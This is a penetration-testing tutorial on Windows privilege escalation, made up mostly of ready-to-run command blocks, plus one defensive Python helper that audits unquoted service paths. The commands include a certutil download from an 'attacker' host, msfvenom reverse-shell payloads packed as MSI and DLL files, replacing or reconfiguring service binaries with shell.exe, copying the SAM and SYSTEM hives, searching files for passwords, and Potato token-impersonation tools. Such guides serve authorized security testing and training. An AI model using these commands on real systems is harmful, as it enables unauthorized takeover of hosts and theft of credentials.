Windows privilege escalation is a critical skill for penetration testers. After gaining initial access to a Windows system, escalating to SYSTEM or Administrator privileges opens up further attack possibilities. This guide covers common Windows privilege escalation techniques.
## Initial Enumeration

### System Information

```cmd
# System info
systeminfo
hostname

# OS version
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# Installed patches
wmic qfe get Caption,Description,HotFixID,InstalledOn

# Architecture
wmic os get osarchitecture
```
### User Information

```cmd
# Current user
whoami
whoami /priv
whoami /groups

# All users
net user
net user username

# Local groups
net localgroup
net localgroup administrators

# Logged-in users
query user
```
### Network Information

```cmd
# Network config
ipconfig /all

# Routing table
route print

# Active connections
netstat -ano

# Firewall status
netsh firewall show state
netsh advfirewall show allprofiles
```
## Automated Enumeration Tools

### WinPEAS

```powershell
# Download and run
certutil -urlcache -f http://attacker/winPEASx64.exe winpeas.exe
.\winpeas.exe
```

### PowerUp

```powershell
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
```

### Seatbelt

```powershell
.\Seatbelt.exe -group=all
```
## Kernel Exploits

```cmd
# Check Windows version and patches
systeminfo
wmic qfe

# Search for exploits
# Use Windows Exploit Suggester
python windows-exploit-suggester.py --database 2024.xlsx --systeminfo sysinfo.txt

# Common kernel exploits:
# MS16-032 - Secondary Logon Handle
# MS15-051 - Win32k.sys
# MS14-058 - TrackPopupMenu
# CVE-2021-1732 - Win32k Elevation
```
## Service Misconfigurations

### Unquoted Service Paths

```cmd
# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

# If path is: C:\Program Files\My App\service.exe
# Windows tries: C:\Program.exe, C:\Program Files\My.exe, etc.
# Exploit by placing malicious exe in writable location
```
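An audit helper for the check above, added here as an example and not part of the original guide: it parses the fixed-width output of `wmic service get name,pathname,startmode` (a constructed sample with made-up service names is embedded), reproduces the prefix search Windows performs on an unquoted path, and lists the directories whose write ACLs should be reviewed with `icacls` for each auto-start service.

```python
import ntpath
import re
# Constructed sample of `wmic service get name,pathname,startmode` output (made-up services).
_ROWS = [
    ("Name", "PathName", "StartMode"),
    ("GoodSvc", r'"C:\Program Files\Good Vendor\svc.exe" -service', "Auto"),
    ("BadSvc", r"C:\Program Files\My App\service.exe -k netsvcs", "Auto"),
    ("ManualSvc", r"C:\Program Files\Other App\svc.exe", "Manual"),
]
SAMPLE_WMIC_OUTPUT = "\n".join(f"{n:<12}{p:<52}{s}" for n, p, s in _ROWS)

def parse_wmic_table(text):
    # Split wmic's fixed-width table into dicts using the header's column offsets.
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    cols = [(m.group(), m.start()) for m in re.finditer(r"\S+", lines[0])]
    rows = []
    for line in lines[1:]:
        row = {}
        for i, (name, start) in enumerate(cols):
            end = cols[i + 1][1] if i + 1 < len(cols) else None
            row[name] = line[start:end].strip()
        rows.append(row)
    return rows

def search_candidates(pathname):
    # Paths CreateProcess tries, in order, for an unquoted command line with spaces: each
    # prefix ending before a space (".exe" added if no extension), up to the first *.exe token.
    if pathname.startswith('"') or " " not in pathname:
        return []
    tokens, out = pathname.split(" "), []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        out.append(prefix if ntpath.splitext(prefix)[1] else prefix + ".exe")
        if tokens[i - 1].lower().endswith(".exe"):
            break
    return out

def audit_unquoted_services(wmic_text):
    # Auto-start services (outside C:\Windows) whose unquoted path makes Windows try other
    # files first: returns (name, those candidate paths, directories whose ACLs to check).
    findings = []
    for row in parse_wmic_table(wmic_text):
        path, mode = row["PathName"], row["StartMode"].lower()
        if mode != "auto" or path.lstrip('"').lower().startswith(r"c:\windows"):
            continue
        cands = search_candidates(path)
        if len(cands) > 1:
            dirs = sorted({ntpath.dirname(c) for c in cands[:-1]})
            findings.append((row["Name"], cands[:-1], dirs))
    return findings
```

Run `audit_unquoted_services` on real `wmic` output and check each reported directory with `icacls`; a directory writable by non-administrators is the finding to fix by quoting the service path.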
### Weak Service Permissions

```cmd
# Check service permissions
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

# If SERVICE_CHANGE_CONFIG permission:
sc config servicename binpath= "C:\temp\shell.exe"
sc stop servicename
sc start servicename
```
### Weak Service Binary Permissions

```cmd
# Check binary permissions
icacls "C:\path\to\service.exe"

# If writable, replace with malicious binary
move service.exe service.exe.bak
copy shell.exe service.exe
sc stop servicename
sc start servicename
```
## Registry Exploits

### AlwaysInstallElevated

```cmd
# Check if enabled
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both return 1, create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f msi -o shell.msi

# Install
msiexec /quiet /qn /i shell.msi
```
### AutoRun Programs

```cmd
# Check AutoRun locations
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Check permissions on AutoRun binaries
accesschk.exe -wvu "C:\path\to\autorun.exe"
```
## Credential Harvesting

### Saved Credentials

```cmd
# Saved credentials
cmdkey /list

# If credentials exist, run as that user
runas /savecred /user:admin cmd.exe
```
### Password Files

```cmd
# Search for passwords
findstr /si password *.txt *.xml *.ini *.config
findstr /spin "password" *.*

# Common locations
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\sysprep\sysprep.xml

# SAM and SYSTEM files (if accessible)
copy C:\Windows\System32\config\SAM C:\temp\
copy C:\Windows\System32\config\SYSTEM C:\temp\
```
### PowerShell History

```cmd
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
```
## Token Impersonation

```cmd
# Check privileges
whoami /priv

# If SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege:
# Use Potato attacks

# PrintSpoofer
PrintSpoofer.exe -i -c cmd

# JuicyPotato (older systems)
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c {CLSID}

# GodPotato
GodPotato.exe -cmd "cmd /c whoami"
```
## Scheduled Tasks

```cmd
# List scheduled tasks
schtasks /query /fo LIST /v

# Check permissions on task binaries
accesschk.exe -wvu "C:\path\to\task.exe"

# If writable, replace binary
# Wait for task to execute
```
## DLL Hijacking

```cmd
# Find missing DLLs with Process Monitor
# Filter: Result contains "NAME NOT FOUND" and Path ends with ".dll"

# If application looks for DLL in writable path:
# Create malicious DLL with same name
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f dll -o missing.dll
```
## Summary
Windows privilege escalation requires systematic enumeration and understanding of common misconfigurations. Always run automated tools like WinPEAS for comprehensive checks, but also perform manual enumeration. Focus on service misconfigurations, credential harvesting, and token impersonation as these provide the most reliable escalation paths.
